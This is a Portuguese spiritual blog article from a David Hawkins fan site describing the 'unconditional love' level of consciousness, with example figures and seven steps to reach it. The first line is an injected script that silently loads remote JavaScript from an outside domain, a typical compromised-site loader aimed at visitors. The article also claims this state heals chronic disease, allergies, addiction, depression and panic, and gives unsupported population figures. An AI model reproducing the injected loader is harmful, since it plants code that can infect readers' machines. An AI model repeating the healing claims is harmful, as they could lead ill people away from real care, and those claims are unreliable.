;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Amor Incondicional: O que é e Como Alcançar - David Hawkins Brasil
Categorias
Níveis de Consciência

O Poder do Amor Incondicional – com base em Dr. David Hawkins

O Amor Incondicional é a expressão da bondade, generosidade e misericórdia. Aquele que vive esta Graça de quase nada mais precisa, pois o próprio amor preenche qualquer vazio e necessidades ilusórias que buscam a felicidade fora.

Quando o amor se torna mais e mais incondicional, alcança um estado de pureza, alegria constante e discernimento preciso. Se poucas pessoas alcançam o nível de consciência de Razão e Amor, no nível de Amor Incondicional encontramos apenas 0,4% da população.

E o que é o nível do Amor Incondicional?

É o nível das curas físicas e emocionais, tais como os vícios.

A maior parte dos integrantes de boa parte dos grupos do AA chegam a este nível de consciência, por exemplo, onde cada participante busca amar o próximo de maneira incondicional e aceitar suas falhas de caráter em prol de suas curas.

Temos também grandes líderes conhecidos que alcançaram este estado de grande alegria interior:

Na política podemos encontrar:

  • Nelson Mandela 
  • Abraham Lincoln,

Como representantes espirituais alguns exemplos como:

  • A maioria dos Papas,
  • Dalai Lama,
  • Padre Pio,
  • Chico Xavier,
  • Chuang Tzu e
  • Paramahansa Yogananda

Na música popular Louis Armstrong, e na arte clássica artistas como Mozart e Michelangelo

Seres que buscam a beleza e o amor como prioridade acima de qualquer detalhe.

Como alcançar o nível do amor incondicional

Para se alcançar o nível de amor incondicional, o ser amoroso, que ama cada vez mais aqueles ao seu redor, deve se tornar amorosidade, ou seja, Ser amor independente de intervenções sociais.

Descobre-se que não é necessário ter alguém para amar se for possível sentir amor a todo momento.

Então amar os outros é apenas uma consequência de Ser amor. Quando se é amor, ama-se não somente outros, mas ama-se cada vez mais:

  • a si mesmo,
  • às situações,
  • às consciências negativas como:

Sabe-se que essas emoções são apenas impulsos animais naturais.

Ama-se incondicionalmente a tudo, sabendo que tudo é igualmente santo e sagrado perante o Todo. O amor a Deus se sobressai e se torna o princípio primário e indubitável.

‘Amai a Deus sobre todas as coisas’ e ‘amai o próximo como a ti mesmo’ é experiencial e natural na grande maioria dos – se não quase todos – momentos e situações.

Definindo o Ser

Simples bondade consigo mesmo e com tudo o que vive a todo momento, sem exceções, define o Ser em amor incondicional.

A alegria e radiância a cada situação vivenciada aumenta a todo momento para aquele que experimenta este nível e busca sua evolução constante.

O alinhamento da vontade pessoal à Vontade Divina se torna cada vez mais afinada e a simplicidade toma conta a cada dia, enquanto o potencial de realização se torna absurdamente poderoso.

Sutilezas desse estado

A busca pelo reconhecimento se torna cada vez mais sutil e na maior parte do tempo não se manifesta.

Tudo que é feito é entregue ao Divino.

Não há mais necessidades de louvores ou saudações, mas quando vêm são recebidas com gratidão e novamente rendidos seus méritos à Vida.

Expectativas são quase inexistentes e, ao mesmo tempo, tudo que é colocada uma intenção pura, tende a se manifestar de forma espontânea, simples, rápida, fácil e de maneira não linear ou lógica.

Troca-se esforço por entrega e há o deleite por se descobrir esta Realidade experiencial.

Quebra-se a crença de que tudo que vem fácil merece desconfiança ou que todo trabalho tem que ser árduo ou difícil. Aceita-se com gratidão e alegria os presentes da vida.

Ao mesmo tempo que possa parecer uma inocência, e é, ela vem com enorme dose de discernimento e sabedoria para separar aquilo que é do ego, apego emocional, e aquilo que é Divino, intuitivo.

Vivencia-se o estado de devoção, onde toda a Graça é recebida e processada.

O trabalho é realizado em prol do Bem Maior. O estado de compaixão se sobressai e então é possível entender a dor e sofrimento de todos os seres e radiar sua alegria para que eles possam se curar de suas angústias, apegos e resistências. 

Este também é o estado dos homens santos e do êxtase em viver.

Neste estado a Presença do Ser potencializa a cura de doenças físicas e emocionais tanto de si mesmo como daqueles que a buscam com fé e determinação.

Curas de doenças crônicas, alergias, vícios, depressões, pânicos, entre outras são dissolvidas de maneira quase que inexplicável. Explicável apenas por quem vivencia e sabe.

Como experienciar o estado de Amor Incondicional

1. Gratidão

  • O Ser deve se ancorar em agradecer a todos os momentos, tanto aqueles que trazem avidez (senso de prazer, bom, agradável) quanto aos que trazem aversão (julgamento de desprazer, ruim, desagradável). 
  • Os elogios devem ser entregues ao Divino como agradecimento por ter sido um canal ou testemunha. 
  • Pessoas que falam o que precisamos ouvir ou nos criticam, podem ser vistas como vozes Divinas e não como fontes de culpa ou diminuição da autoestima.

2. Humor

  • As dramatizações do ego precisam ser recontextualizadas para comédia leve.
  • Ao invés de viver o drama da vida do ego, assistir a si mesmo em um stand up comedy inocente e de censura livre
  • Nada de enxergar sarcasmo ou sadismo da vida, tudo é divertido e animado como em um desenho animado inocente e divertido. 
  • Um leve sorriso humilde de pano de fundo deve se revelar no surgimento de adversidades e situações inesperadas.

3. Desapego

  • É preciso entregar as limitações do amor condicional à incondicionalidade. Isso requer render o amor como um apego positivo pessoal para que ele possa se tornar uma forma de estar no mundo e não como uma emoção separada. 
  • O amor deve se tornar uma expressão da essência pela qual o amoroso se torna amorosidade. 
  • O amor como um modo de existência não requer “outros” como objetos de realização ou expressão. É uma qualidade independente, sem sujeito, objeto, verbo, adjetivo e, portanto, não-linear e ilimitado.

4. Não-julgamento

  • Por auto-honestidade e exame interno, as limitações são reveladas, geralmente como julgamentos residuais ou como o impacto de experiências anteriores. 
  • Colocar intenção em alterar a dualidade de percepção de “bom” vs “mau” para “mais preferível” vs “menos preferível”. 
  • Abandonar a fé na validade de seus pensamento e ideias, os identificando como apenas imagens e palavras sem realidade atual.

5. Misericórdia

  • A chave do amor incondicional é a vontade de perdão para desfazer ressentimentos passados e a visão de pessoas como antipáticas e indignas de amor puro. 
  • Pela vontade de perdoar e render suas percepções, elas podem ser recontextualizadas como limitadas, menos preferíveis, ou influenciadas por programações do ego. 
  • Perdão decorre da humildade de entregar o mundo e seus eventos a Deus.

6. Discernimento

  • As dificuldades deste mundo parecem ser consequência de diferentes níveis de consciência juntos simultaneamente, o que resulta em turbulência social.
  • Ao mesmo tempo  que a disponibilidade de um espectro tão amplo permite a maior oportunidade de crescimento a partir do esgotamento do carma negativo e, por opção, o acúmulo de carma positivo, tornando este domínio o da oportunidade espiritual máxima com vasta multidão de opções para a evolução da consciência, sobre a qual se pode ser grato ao invés de ressentido

7. Rendição

A rendição diante de um obstáculo é um pedido para o Espírito Santo revelar um milagre e é atendido a partir da vontade de entregar seus posicionamentos de percepções parciais e seu ganho egoísta para a revelação da verdade.

Gloria in Excelsis Deo!

Este artigo faz parte de uma série de artigos que exploram os níveis de consciência humanos.

Abaixo a lista dos artigos sobre os níveis de consciência em ordem:

00. Entendendo os níveis de consciência

01. Como vencer a vergonha?

02. Culpa, para que serve?

03. Como se livrar da tristeza?

04. Enfrentando o medo.

05. O desejo é a fonte do sofrimento.

06. Como controlar a raiva.

07. Por que o orgulho pode nos Prejudicar?

08. Coragem é a base do sucesso.

09. A neutralidade nos ajudar a não sofrer.  

10. Disposição pode nos levar a resultados inimagináveis

11. Aceitação, o caminho do perdão.

12. Apenas 4% das pessoas utilizam a razão.

13. O poder do amor incondicional

14. A Paz e o processo de Iluminação

15. Como despertar a Iluminação Espiritual

2 respostas em “O Poder do Amor Incondicional – com base em Dr. David Hawkins”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *